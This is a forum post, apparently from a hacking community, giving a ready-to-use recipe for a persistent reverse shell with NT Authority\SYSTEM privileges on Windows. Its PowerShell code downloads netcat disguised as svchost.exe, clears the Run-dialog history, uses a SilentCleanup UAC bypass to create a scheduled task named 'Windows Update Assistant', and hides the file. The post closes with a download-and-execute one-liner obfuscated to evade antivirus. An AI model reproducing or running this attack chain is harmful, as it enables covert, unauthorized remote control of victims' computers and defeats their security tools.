Jump to content

Persistent reverse shell with NT Authority\SYSTEM privileges in 3 seconds


nyshone

Recommended Posts

 
So how do we create such reverse shell?
 
Well, first of all you need to download netcat 1.12 and extract the nc64.exe. Once you got it extracted upload it to some file-hosting service of your choice, which provides DIRECT LINK (very important!!). I used Discord, works like charm and link doesn't expire.
 
Second, you need to make yourself an .XML file which you're gonna need later for Task Scheduler. I believe scheduled tasks are rly good way to set up persistence, as well as escelating the file that it executes to NT Authority\SYSTEM privileges, while remaining stealthy. I already did the work for you. This is what it should look like. Just modify the arguments in the bottom to your IP/PORT. Once you got that done, save it and upload it for DIRECT LINK, just like you uploaded your previous file.
 
Now, that the boring setup part is over, we get to the actual code that's being executed to achieve this type of shell:
cd $env:public
$url1="YOUR_NC64_LINK"
$url2="YOUR_XML_LINK"
$path1="$env:public\svchost.exe"
$path2="$env:public\x.xml"
(new-object net.webclient).downloadfile($url1,$path1)
(new-object net.webclient).downloadfile($url2,$path2)
cmd /r 'reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /f&reg add "HKCU\Environment" /v "windir" /d "%comspec% /r mode 18,1&cd %public%&schtasks /create /tn \"Windows Update Assistant\" /f /xml x.xml >nul&schtasks /run /tn \"Windows Update Assistant\" /i >nul&REM "&timeout /t 1&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul&timeout /t 1&reg delete "HKCU\Environment" /v "windir" /F&attrib +s +h svchost.exe&del /q x.xml'

 

So first, it downloads both of your files via powershell, then it clears our Windows + R history to clear any traces of itself (if you're using USB RubberDucky). Then it uses this UAC bypass technique to create scheduled task called Windows Update Assistant, which is set to be executed to run with NT Authority\SYSTEM privileges in our .XML file. Then it marks our nc64.exe file as hidden system file, which is also now called svchost.exe and then it deletes our .XML file, since system doesn't need it anymore after task is created.
 
Now you're probably thinking, this is all nice, but how the fk do I run this in one-line of code?
Very simple, by invoking expression called DownloadString in powershell like this:
powershell -nop -w 1 -c "iex (new-object net.webclient).downloadstring('YOUR_PASTEBIN')"

 

But problem with this one-liner is, that it gets picked up by most AVs as "malicious activity". Therefore, we need to obfuscate it a bit:
cmd.exe /c powershell -nop -w 1 -c "iex (.('ne'+'w-ob'+'ject') ('ne'+'t.webc'+'lient')).('do'+'wnloadstr'+'ing').invoke(('Y'+'OUR_'+'PASTEBIN'))"

 

And there it is, this one liner will get you persistent reverse shell which will check for itself every minute if it's running and if it's not, then it executes itself silently in the background.
  • Like 1
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...